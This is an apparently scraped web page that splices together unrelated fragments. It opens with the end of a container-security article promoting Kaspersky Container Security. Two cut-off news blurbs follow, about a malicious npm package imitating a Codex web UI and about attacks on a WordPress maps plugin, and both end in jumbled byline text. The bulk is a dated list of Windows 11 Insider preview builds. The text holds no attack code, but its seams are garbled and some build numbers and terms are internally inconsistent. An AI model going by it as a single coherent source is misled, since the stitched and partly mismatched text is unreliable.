Overall, modern attacks on container environments demonstrate that the primary threat arises not just from within the container itself, but from the implementation of the container infrastructure as a whole. Containers are frequently exploited as an initial foothold to establish persistence within a system; following an initial compromise, attackers aim to either escalate to the host OS level or gain control over infrastructure management via containerization and orchestration APIs. To achieve this, they exploit weak configurations, excessive capabilities, and isolation flaws.

Furthermore, there is a visible trend of attacks shifting toward CI/CD pipelines, where compromising a single component can lead to a full infrastructure takeover. Therefore, under current realities, securing containerized environments requires an approach that encompasses host protection, strict access control within the orchestrator, minimization of container capabilities, and comprehensive validation of the entire supply chain. Our solution Kaspersky Container Security has been designed with the specific characteristics of container environments in mind and provides protection at various levels from container images to the host system helping to implement the principles of secure software development.

Cybersecurity researchers have disclosed details of a new malicious supply chain campaign that's targeting developers using OpenAI Codex through a legitimate-looking remote web UI. The tool, named codexui-android, is advertised on GitHub and npm as a remote web UI for OpenAI Codex, attracting over 29,000 weekly downloads. The package is still available for download from the repository. What Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Threat actors are attempting to actively exploit a critical security flaw impacting WP Maps Pro, a WordPress plugin that has had over 15,000 sales on the Envato Market, to create malicious administrator accounts on susceptible sites. WP Maps Pro allows site owners to embed customizable Google Maps and OpenStreetMap with markers, listings, and advanced location features on WordPress sites. It isRavie Lakshmananhttp://www.blogger.com/profile/[email protected]

Windows 11 25H2 has been publicly released, but behind the scenes, Microsoft is constantly working to improve the newest version of Windows. The company frequently rolls out preview builds to members of its Windows Insider Program, allowing them to test out — and help shape — upcoming features.

Skip to the latest builds

Our story “How to preview and deploy Windows 10 and 11 updates” details how the Insider program has worked until now. However, Microsoft recently announced sweeping changes to the program that will include the ability to select which new features to test. As the first step, the company is introducing a new channel system and transitioning Insiders like so:

• Beta Channel > Beta 
• Dev Channel > Experimental
• Canary Channel (28000 series) > Experimental (26H1)
• Canary Channel (29500 series) > Experimental (Future Platforms)
• Release Preview Channel (for devices on Windows 11 versions 24H2 and 25H2 > Release Preview 24H2/25H2
• Release Preview Channel (for devices on Windows 11 version 26H1 > Release Preview 26H1

This transition is happening over time, starting with the Dev Channel. See Microsoft’s blog post for more information about the transition.

Below you’ll find information about the Windows 11 preview builds that have been announced by Microsoft in the past six months. For each build, we’ve included the date of its release, which Insider channel it was released to, a summary of what’s in the build, and a link to Microsoft’s announcement about it.

Note: If you’re looking for information about updates being rolled out to all Windows 11 users, not preview builds for Windows Insiders, see “Windows 11: A guide to the updates.”

The latest Windows 11 Insider preview builds Windows 11 Insider Preview Build 26220.8544

Release date: May 29, 2026

Released to: Beta Channel

Several minor new improvements and fixes are being rolled out in this build, including consistent solid (donut) spinners across key Windows scenarios including Boot, Logon, Restart, Shutdown, and Update. This update replaces legacy spinner visuals to deliver a more cohesive experience aligned with Windows design standards. Users will now see a unified spinner behavior with corresponding status text (e.g., “Restarting”, “Working on updates”, “Welcome”).

(Get more info about Windows 11 Insider Preview Build 26220.8544.)

Windows 11 Insider Preview Build 26300.8553

Release date: May 29, 2026

Released to: Experimental Channel (formerly Dev)

Several minor new features are being rolled out gradually in this build, including a number of changes to the Start menu. These were first outlined in the May 15 Insider blog post Making Taskbar and Start more personal. They include:

• “Recommended” section renamed to “Recent” in Start and Settings page
• Section-level toggles to independently show or hide Pinned, Recommended, and All
• Choose between a small and large Start menu, in addition to already available “Automatic (default)” setting
• Option to hide your name and profile picture in Start
• Redesigned Start menu settings page

One known issue, in which resetting your PC may have gotten stuck when using “Reset this PC,” has been fixed.

(Get more info about Windows 11 Insider Preview Build 26300.8553.)

Windows 11 Insider Preview Build 28020.2207

Release date: May 29, 2026

Released to: Experimental 26H1 Channel (formerly Canary)

This update, in Microsoft’s words, “includes a small number of minor bug fixes and improvements.”

(Get more info about Windows 11 Insider Preview Build 28020.2207.)

Windows 11 Insider Preview Build 29599.1000

Release date: May 29, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build gradually rolls out several minor changes and improvements that, in the words of Microsoft, include “platform changes in moving to a new active development build.” The update also gradually rolls out a fix for a bug in which some Insiders unexpectedly saw an erroneous message saying they weren’t connected to internet (when they actually were) when signing into their Microsoft account in certain apps. It also improves CPU speed display on the Performance page of Task Manager for VMs, so it doesn’t show higher than unexpected numbers after resuming from hibernate.

There is one known issue that causes crashes with AMD machines supporting System Guard, so these devices in Windows Information Protection will not be offered the build.

(Get more info about Windows 11 Insider Preview Build 29599.1000.)

Windows 11 Insider Preview Build 26220.8491

Release date: May 22, 2026

Released to: Beta Channel

This update, in Microsoft’s words, “includes a small number of minor bug fixes and improvements.” It introduces Voice Isolation, a new option in Voice Access that helps the tool focus on your voice, even when others are speaking nearby, by filtering out other voices and background noise.

Microsoft says the single known issue with this release, in which your PC could have gotten stuck when using “Reset this PC,” has been fixed.

(Get more info about Windows 11 Insider Preview Build 26220.8491.)

Windows 11 Insider Preview Build 26300.8497

Release date: May 22, 2026

Released to: Experimental Channel (formerly Dev)

A variety of new features are being rolled out gradually in this build, including several to improve accessibility. Among them are making it easier to connect the Braille display to Narrator by using the HID open industry standard for Braille displays. If your display supports HID, connect it via USB, with no additional setup required. For Bluetooth, pair your HID Braille display in Settings > Bluetooth & devices just like any other accessory. Another new feature is Voice Isolation in Voice Access, as detailed for Beta Channel Build 26220.8491 above.

The build has one known issue, in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.

(Get more info about Windows 11 Insider Preview Build 26300.8497.)

Windows 11 Insider Preview Build 28020.2149

Released to: Experimental 26H1 Channel (formerly Canary)

Release date: May 22, 2026

This build, for Insiders using Windows 11 26H1, gradually rolls out a wide variety of new features, including one that improves the reliability of explorer.exe when closing the input switcher, and when switching between multiple desktops.

Microsoft says the single known issue with this release, in which your PC could have gotten stuck when using “Reset this PC,” has been fixed.

(Get more info about Windows 11 Insider Preview Build 28020.2149.)

Windows 11 Insider Preview Build 29595.1000

Release date: May 22, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build, in the words of Microsoft, “includes platform changes in moving to a new active development build.”

(Get more info about Windows 11 Insider Preview Build 29595.1000.)

Windows 11 Insider Preview Build 26220.8474

Release date: May 15, 2026

Released to: Beta Channel

Several minor new improvements are being rolled out in this build, including one that improves the reliability of Simple Service Discovery Protocol (SSDP) notifications to help prevent the service from becoming unresponsive.

It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.

(Get more info about Windows 11 Insider Preview Build 26220.8474.)

Windows 11 Insider Preview Build 26300.8493

Release date: May 15, 2026

Released to: Experimental Channel (formerly Dev)

A variety of new features are being rolled out gradually in this build, including the ability to change the position of taskbar on your screen. In Settings > Personalization > Taskbar > Taskbar Behaviors, you can select the side of the screen you want your taskbar on: bottom, top, left, or right. In these other positions, tooltips, flyouts, and animations will still come from the taskbar, and most customization settings like “small taskbar” and “never combine taskbar icons” will work with all locations.

It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.

(Get more info about Windows 11 Insider Preview Build 26300.8493.)

Windows 11 Insider Preview Build 28020.2134

Release date: May 15, 2026

Released to: Experimental 26H1 Channel (formerly Canary)

This build gradually rolls out an improvement in the reliability of Simple Service Discovery Protocol (SSDP) notifications to help prevent the service from becoming unresponsive. It also rolls out gradual changes to updating Windows, including the ability to skip updates immediately during the out of box experience (OOBE) and to extend update pauses as many times as you need.

It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.

(Get more info about Windows 11 Insider Preview Build 28020.2134.)

Windows 11 Insider Preview Build 29591.1000

Release date: May 15, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build introduces new features for Windows Update, including the ability to skip updates immediately during the out of box experience (OOBE) and to extend update pauses as many times as you need. New Windows update features also include having always available options to shut down and restart with updating, and additional insight about available updates to make more informed installation decisions.

(Get more info about Windows 11 Insider Preview Build 29591.1000.)

Windows 11 Insider Preview Builds 26200.8514/26200.8514

Release date: May 14, 2026

Released to: Release Preview 24H2/25H2 Channel

A wide variety of features and enhancements are being gradually rolled out in this build, including a new shared audio feature that allows two people to listen to the same audio from a single Windows 11 PC at the same time. In addition, Task Manager now offers improved visibility into NPU usage on PCs with an NPU. New optional NPU and NPU Engine columns are available on the Processes, Users, and Details pages, along with NPU Dedicated Memory and NPU Shared Memory optional columns on the Details page. 

One new feature is being rolled out immediately, in which Windows quality updates now include additional high-confidence device targeting data, increasing coverage of devices eligible to automatically receive new Secure Boot certificates. Devices receive the new certificates only after demonstrating sufficient successful update signals, maintaining a controlled and phased rollout.

(Get more info about Windows 11 Insider Preview Builds 26200.8514/26220.8514.)

Windows 11 Insider Preview Build 28000.2173

Released to: Release Preview 26H1 Channel

Release date: May 14, 2026

This build, for Insiders using Windows 11 26H1, gradually rolls out a wide variety of new features, including one that expands the list of archive formats that can be used in File Explorer to include uu, cpio, xar, and NuGet Packages (nupkg). Also being gradually rolled out is a new way to monitor your agents from the taskbar. It supports agents across first- and third-party apps, with Researcher in the Microsoft 365 Copilot app as the first adopter.

One new feature is being rolled out immediately, in which Windows quality updates now include additional high-confidence device targeting data, increasing coverage of devices eligible to automatically receive new Secure Boot certificates. Devices receive the new certificates only after demonstrating sufficient successful update signals, maintaining a controlled and phased rollout.

(Get more info about Windows 11 Insider Preview Build 28000.2173.)

Windows 11 Insider Preview Build 26220.8370

Release date: May 8, 2026

Released to: Beta Channel

Several minor new improvements are being gradually rolled out in this build, including improved reliability of Japanese IME usage when Administrator Protection is enabled. In addition, the build fixes a single bug, in which there were notification issues and certain apps hung on launch.

(Get more info about Windows 11 Insider Preview Build 26220.8370.)

Windows 11 Insider Preview Build 26300.8376

Release date: May 8, 2026

Released to: Experimental Channel (formerly Dev)

A variety of new features are being rolled out gradually in this build, including new File Explorer address bar support for paths containing double backslashes and quotation marks (for example, C:\Users\user or “C:\Users\user”), improving compatibility with a wider range of inputs.

(Get more info about Windows 11 Insider Preview Build 26300.8376.)

Windows 11 Insider Preview Build 28020.2075

Release date: May 8, 2026

Released to: Experimental 26H1 Channel (formerly Canary)

This build gradually rolls out, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience” of running Windows 26H1. It also improves performance when opening clipboard history.

(Get more info about Windows 11 Insider Preview Build 28020.2075.)

Windows 11 Insider Preview Build 29585.1000

Release date: May 6, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build gradually rolls out, in Microsoft’s words, “platform changes in moving to a new active development build.”

It also updates the experience when you use voice typing with the touch keyboard. To reduce distractions, the new design removes the previous full‑screen overlay and instead shows voice typing animations directly on the dictation key.

(Get more info about Windows 11 Insider Preview Build 29585.1000.)

Windows 11 Insider Preview Build 26220.8340

Release date: May 1, 2026

Released to: Beta Channel

Several minor new improvements are being gradually rolled out in this build, including making Windows ShareSheet more intelligent for Azure Active Directory (AAD) users, with a simple setting to turn promotional app recommendations on or off. Previously, that capability was only available to Windows users with Managed Service Accounts (MSA).

(Get more info about Windows 11 Insider Preview Build 26220.8340.)

Windows 11 Insider Preview Build 26300.8346

Release date: May 1, 2026

Released to: Experimental Channel (formerly Dev)

A variety of new features are being rolled out gradually in this build, including making Windows ShareSheet more intelligent for Azure Active Directory (AAD) users, with a simple setting to turn promotional app recommendations on or off. Previously, that capability was only available to Windows users with Managed Service Accounts (MSA). Another change “quiets” the default behavior for Widgets, with the goal of making them feel less distracting and overwhelming.

There are several known issues in this build, including one in which Insiders who use Feature flags to enable the new WIP experience may see the feature state incorrectly marked as current; however, changing state and applying changes will work as expected.

(Get more info about Windows 11 Insider Preview Build 26300.8346.)

Windows 11 Insider Preview Build 28020.1921

Release date: May 1, 2026

Released to: Experimental 26H1 Channel (formerly Canary)

This build gradually rolls out several improvements to Task Manager, including one that provides better insight into NPU usage for PCs that include an NPU. Optional NPU and NPU Engine columns are now available on the Processes, Users, and Details pages, with optional NPU Dedicated Memory and NPU Shared Memory columns on the Details page to give you deeper visibility into how workloads are using NPU resources. Additionally, if there are neural engines that are part of a GPU, they will now appear on the Performance page, providing a more complete view of AI‑related system activity.

(Get more info about Windows 11 Insider Preview Build 28020.1921.)

Windows 11 Insider Preview Build 29580.1000

Release date: May 1, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build gradually rolls out, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running this build on their PCs.”

(Get more info about Windows 11 Insider Preview Build 29580.1000.)

Windows 11 Insider Preview Build 26220.8283

Release date: April 24, 2026

Released to: Beta Channel

Several minor new improvements and fixes are being gradually rolled out in this build, including improved detection of clicks at the leftmost edge of the taskbar to invoke the Start menu when the taskbar icons are left-aligned.

(Get more info about Windows 11 Insider Preview Build 26220.8283.)

Windows 11 Insider Preview Build 26300.8289

Release date: April 24, 2026

Released to: Experimental Channel (formerly Dev)

In a phased rollout, Insiders in the Dev Channel are being moved to the new Experimental channel. Insiders who do not see the new experience on their device can enable it under Settings > Windows Update > Windows Insider Program > Feature flags.

Several minor new features are also being rolled out gradually in this build, including improved detection of clicks at the leftmost edge of the taskbar to invoke the Start menu when the taskbar icons are left-aligned.

There is one known issue in this build: Insiders who use Feature flags to enable the new Insider experience may see the feature state incorrectly marked as current; however, changing the state and applying changes should work as expected.

(Get more info about Windows 11 Insider Preview Build 26300.8289.)

Windows 11 Insider Preview Build 28200.1873

Release date: April 24, 2026

Released to: Experimental 26H1 Channel (formerly Canary)

This build is gradually rolling out a variety of small improvements, including an updated voice typing experience for the touch keyboard. To reduce distractions, the new design shows voice typing animations directly on the dictation key rather than on a full-screen overlay.

It also fixes a bug in which Settings > Network & Internet > Data Usage showed large, unrealistic values.

(Get more info about Windows 11 Insider Preview Build 28200.1873.)

Windows 11 Insider Preview Build 29576.1000

Release date: April 24, 2026

Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)

This build is gradually rolling out a variety of changes, including Point-in-time restore for Windows, which can quickly roll your device back to a previous state, potentially helping minimize downtime and simplify troubleshooting when disruptions strike. 

(Get more info about Windows 11 Insider Preview Build 29576.1000.)

Windows 11 Builds 26100.8313 and 26200.8313 (KB5083631) 

Release date: April 17, 2026

Released to: Release Preview Channel

This build introduces a wide variety of new features rolled out gradually, including a new way to monitor your agents from the taskbar. It supports agents across first- and third-party apps, with Researcher in the Microsoft 365 Copilot app as the first adopter. When Researcher works on a report, Windows shows progress on the taskbar so you can check updates at a glance.

For IT administrators, the update gradually rolls out support for a dynamic app removal list to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education. It also removes default trust for cross‑signed third-party drivers, while drivers from the Windows Hardware Compatibility Program (WHCP) and an allow list of trusted legacy drivers remain allowed. Enterprise State Roaming can now be managed through Windows Backup for Organizations policies.

The update also immediately introduces two minor improvements for everyone. Windows quality updates now include additional high-confidence device targeting data, which increases coverage of devices eligible to automatically receive new Secure Boot certificates. In Windows Security, the name of the affected application is now included in event logging related to CVE‑2024‑30098. This change makes it easier to identify applications that rely on smart card certificates and may need updates following recent security changes.

(Get more info about Windows 11 Builds 26100.8313 and 26200.8313.)

Windows 11 Insider Preview Build 26220.8271

Release date: April 17, 2026

Released to: Beta Channel

Several minor new features were made available in this build for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.

(Get more info about Windows 11 Insider Preview Build 26220.8271.)

Windows 11 Insider Preview Build 26300.8276

Release date: April 17, 2026

Released to: Dev Channel

In this build, several minor new features are being gradually rolled for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.

(Get more info about Windows 11 Insider Preview Build 26300.8276.)

Windows 11 Insider Preview Build 28020.1863

Release date: April 17, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build fixes a bug that prevented some apps from signing in due to a false report of no internet connectivity. The fix is rolling out gradually.

(Get more info about Windows 11 Insider Preview Build 28020.1863.)

Windows 11 Insider Preview Build 29570.1000

Release date: April 17, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build has a variety of minor changes rolling out gradually, including more widget options and support for lock screen widget personalization, a new setting in Settings > Bluetooth & Devices > Touchpad that lets you can choose how large the right-click zone is, and support for a dynamic app removal list to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education.

(Get more info about Windows 11 Insider Preview Build 29570.1000.)

Windows 11 Insider Preview Build 26220.8165

Release date: April 10, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.

It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.

(Get more info about Windows 11 Insider Preview Build 26220.8165.)

Windows 11 Insider Preview Build 26300.8170

Release date: April 10, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.

It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.

(Get more info about Windows 11 Insider Preview Build 26300.8170.)

Windows 11 Insider Preview Build 28020.1812

Release date: April 10, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out general improvements and fixes, including a new setting that lets users choose the size of their touchpad’s right-click zone, as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status.

(Get more info about Windows 11 Insider Preview Build 28020.1812.)

Windows 11 Insider Preview Build 29565.1000

Release date: April 10, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build includes “platform changes in moving to a new active development build,” as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status

(Get more info about Windows 11 Insider Preview Build 29565.1000.)

Windows 11 Insider Preview Build 26220.8148

Release date: April 3, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including a new icon in print settings to indicate when a printer supports Windows Protected Print Mode.

Several bugs are also being fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.

(Get more info about Windows 11 Insider Preview Build 26220.8148.)

Windows 11 Insider Preview Build 26300.8155

Release date: April 3, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which users will be able to feel haptic feedback effects on compatible input devices while performing certain actions, such as aligning objects in PowerPoint, window snapping, resizing, or hovering over the Close button. These haptic effects can be configured in Settings under Bluetooth & devices > Mouse > Haptic signals.

Several bugs have also been fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.

(Get more info about Windows 11 Insider Preview Build 26300.8155.)

Windows 11 Insider Preview Build 28020.1803

Release date: April 3, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates in the Canary Channel, this build includes a small set of general improvements and fixes, including improved reliability for configuring the fluid dictation option in voice typing settings.

(Get more info about Windows 11 Insider Preview Build 28020.1803.)

Windows 11 Insider Preview Build 29560.1000

Release date: April 3, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build “includes platform changes in moving to a new active development build,” in the words of Microsoft. Several bugs have also been fixed, including one in which attached USB devices weren’t working for some Insiders.

(Get more info about Windows 11 Insider Preview Build 29560.1000.)

Windows 11 Insider Preview Build 26220.8138

Release date: March 30, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection in Settings under Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required. 

(Get more info about Windows 11 Insider Preview Build 26220.8138.)

Windows 11 Insider Preview Build 26300.8142

Release date: March 30, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection in Settings under Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required. 

(Get more info about Windows 11 Insider Preview Build 26300.8142.)

Windows 11 Insider Preview Build 28020.1797

Release date: March 30, 2026

Released to: Canary Channel

This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience” of running Windows 11.

(Get more info about Windows 11 Insider Preview Build 28020.1797.)

Windows 11 Insider Preview Build 29558.1000

Release date: March 30, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Windows 11 Insider Canary Channel on the optional 29500 build series, this build introduces several new features, including a variety of improvements to the Windows Console, many of which were created by open-source contributors. Several bugs have also been fixed, including an authentication error people received when trying to connect to Azure Virtual Desktop.

(Get more info about Windows 11 Insider Preview Build 29558.1000.)

Windows 11 Insider Preview Build 26220.8079

Release date: March 20, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network. 

(Get more info about Windows 11 Insider Preview Build 26220.8079.)

Windows 11 Insider Preview Build 26300.8085

Release date: March 20, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build resumes rollout of the Point Indicator Accessibility setting, which enables low-vision users to easily locate and use their cursor. The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

In addition, several bugs were fixed, including one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network.

(Get more info about Windows 11 Insider Preview Build 26300.8085.)

Windows 11 Insider Preview Build 28020.1743

Release date: March 20, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build includes several new features being rolled out gradually, including one in which shared audio now provides individual sliders for each listener which adjusts their volume without affecting the other. You can continue to adjust volume for both listeners at the same time through the main volume controls available through Quick Settings or on-device and keyboard controls.

The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

(Get more info about Windows 11 Insider Preview Build 28020.1743.)

Windows 11 Insider Preview Build 29553.1000

Release date: March 20, 2026

Released to: Canary Channel (29500 build series)

For those who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.

(Get more info about Windows 11 Insider Preview Build 29553.1000.)

Windows 11 Insider Preview Build 26220.8062

Release date: March 13, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.

Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.

(Get more info about Windows 11 Insider Preview Build 26220.8062.)

Windows 11 Insider Preview Build 26300.8068

Release date: March 13, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.

Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.

(Get more info about  Windows 11 Insider Preview Build 26300.8068.)

Windows 11 Insider Preview Build 28020.1737

Release date: March 13, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build makes refinements to the Pen settings page, including small changes to the options for the pen tail button. A new option, “Same as Copilot key,” enables the pen tail button to launch the same app as the Copilot key.

(Get more info about Windows 11 Insider Preview Build 28020.1737.)

Windows 11 Insider Preview Build 29550.1000

Release date: March 13, 2026

Released to: Canary Channel (29500 build series)

For those  who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build has a variety of minor changes, including one in which changes to global power settings (for example, Display, Sleep, Hibernate timeouts, Power/Sleep button, and lid close actions) from Settings are now applied to all power plans. This should help improve persistence of chosen settings.

(Get more info about Windows 11 Insider Preview Build 29550.1000.)

Windows 11 Insider Preview Builds 26100.8106 and 26200.8106

Release date: March 12, 2026

Released to: Release Preview Channel

This build introduces a wide range of minor features being rolled out gradually, including the ability to turn Smart App Control (SAC) on or off without needing a clean install. To make changes, go to Settings > Windows Security > App & Browser Control > Smart App Control settings. When turned on, SAC helps block untrusted or potentially harmful apps.

The update also improves stability in Windows Recovery Environment (Windows RE) when you run x64 apps on ARM64 devices. These apps run more smoothly and respond as expected.

(Get more info about Windows 11 Insider Preview Builds 26100.8106 and 26200.8106.)

Windows 11 Insider Preview Build 26220.7961

Release date: March 6, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.

Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing (Windows key + H) when renaming files in File Explorer, as well as a smaller peek view in the drag tray.

(Get more info about Windows 11 Insider Build 26220.7961.)

Windows 11 Insider Preview Build 26300.7965

Release date: March 6, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.

Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing when renaming files in File Explorer, as well as a smaller peek view in the drag tray.

(Get more info about Windows 11 Insider Preview Build 26300.7965.)

Windows 11 Insider Preview Build 28020.1685

Release date: March 6, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build lets you use voice typing (Windows key + H) when renaming files in File Explorer. The build also improves the reliability of removing Windows Update files and windows.old files via Settings > System > Storage.

(Get more info about Windows 11 Insider Preview Build 28020.1685.)

Windows 11 Insider Preview Build 26220.7934

Release date: Feb. 27, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.

There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, giving a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.

(Get more info about Windows 11 Insider Preview Build 26220.7934.)

Windows 11 Insider Preview Build 26300.7939

Release date: Feb. 27, 2026

Released to: Dev Channel

For those who opted to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.

There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, offering a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.

(Get more info about Windows 11 Insider Preview Build 26300.7939.)

Windows 11 Insider Preview Build 28020.1673

Release date: Feb. 27, 2026

Released to: Canary Channel

For those who have opted to receive the latest updates, this build gets a variety of new features being rolled out gradually, including one in which Quick Machine Recovery (QMR) now turns on automatically for enterprise managed Windows Professional devices, as well as Windows Professional devices that are not domain-joined. These devices receive the same recovery features available to Windows Home users. For domain-joined devices, QMR stays off unless it is enabled by the organization.

(Get more info about Windows 11 Insider Preview Build 28020.1673.)

Windows 11 Insider Preview Build 26220.7872

Release date: February 20, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.

(Get more info about Windows 11 Insider Preview Build 26220.7872.)

Windows 11 Insider Preview Build 26300.7877

Release date: February 20, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.

Several bugs have also been fixed, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.

Get more info about Windows 11 Insider Preview Build 26300.7877.)

Windows 11 Insider Preview Build 28020.1619

Release date: February 20, 2026

Released to: Canary Channel

For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including one in which Windows Hello Enhanced Sign-in Security (ESS) supports peripheral fingerprint sensors. Previously, ESS was only available on PCs with built-in biometric sensors, but now it can be used when you plug in a supported ESS fingerprint reader.

(Get more info about Windows 11 Insider Preview Build 28020.1619.)

Optional Windows 11 Insider Preview Build 29531.1000

Release date: February 18, 2026

Released to: Canary Channel

This build is the first in a new Canary Channel optional path with a focus on platform development, which will introduce new features before the existing 28000 Canary Channel series. Microsoft recommends that most people remain on the 28000 build path, but adds that those who want to get the newest platform changes as early as possible may want to switch to this new 29500 path. Note, though, that if you switch to the 29500 path by installing this build, you won’t be able to go back to the 28000 Canary Channel series.

The build itself, in Microsoft’s words, “includes platform changes in moving to a new active development build.”

